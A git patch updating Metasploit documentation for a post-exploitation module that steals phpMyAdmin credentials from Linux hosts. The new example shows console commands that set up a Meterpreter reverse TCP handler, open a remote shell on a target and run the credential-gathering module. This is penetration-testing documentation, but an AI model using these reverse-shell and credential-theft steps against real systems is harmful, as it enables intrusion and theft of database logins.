From 50df5e386acf5f00e329e588a5fba0b94af31ff5 Mon Sep 17 00:00:00 2001
From: Shelby Pace
Date: Thu, 6 Sep 2018 12:11:14 -0500
Subject: [PATCH] modified doc to reflect new output
---
.../post/linux/gather/phpmyadmin_credsteal.md | 53 +++++++++----------
1 file changed, 25 insertions(+), 28 deletions(-)
diff --git a/documentation/modules/post/linux/gather/phpmyadmin_credsteal.md b/documentation/modules/post/linux/gather/phpmyadmin_credsteal.md
index e848c15634..a123835c71 100644
--- a/documentation/modules/post/linux/gather/phpmyadmin_credsteal.md
+++ b/documentation/modules/post/linux/gather/phpmyadmin_credsteal.md
@@ -15,36 +15,33 @@ This post module gathers PhpMyAdmin Creds from target Linux machine. ## Scenarios ``` -msf exploit(multi/handler) > [*] Sending stage (857352 bytes) to 127.0.0.1 -[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:46066) at 2018-08-18 14:46:52 -0400 +msf5 post(linux/gather/phpmyadmin_credsteal) > use multi/handler +msf5 exploit(multi/handler) > set lhost 192.168.37.1 +lhost => 192.168.37.1 +msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp +payload => linux/x64/meterpreter/reverse_tcp +msf5 exploit(multi/handler) > run -msf exploit(multi/handler) > use post/linux/gather/phpmyadmin_credsteal -msf post(linux/gather/phpmyadmin_credsteal) > set SESSION 1 -SESSION => 1 -msf post(linux/gather/phpmyadmin_credsteal) > exploit +[*] Started reverse TCP handler on 192.168.37.1:4444 +[*] Sending stage (816260 bytes) to 192.168.37.226 +[*] Meterpreter session 2 opened (192.168.37.1:4444 -> 192.168.37.226:34880) at 2018-09-06 08:49:52 -0500 + +meterpreter > background +[*] Backgrounding session 2... +msf5 exploit(multi/handler) > use post/linux/gather/phpmyadmin_credsteal +msf5 post(linux/gather/phpmyadmin_credsteal) > set session 2 +session => 2 +msf5 post(linux/gather/phpmyadmin_credsteal) > run + + +PhpMyAdmin Creds Stealer! [+] PhpMyAdmin config found! -[+] Extracting config file! - - +msf5 post(linux/gather/phpmyadmin_credsteal) > + ```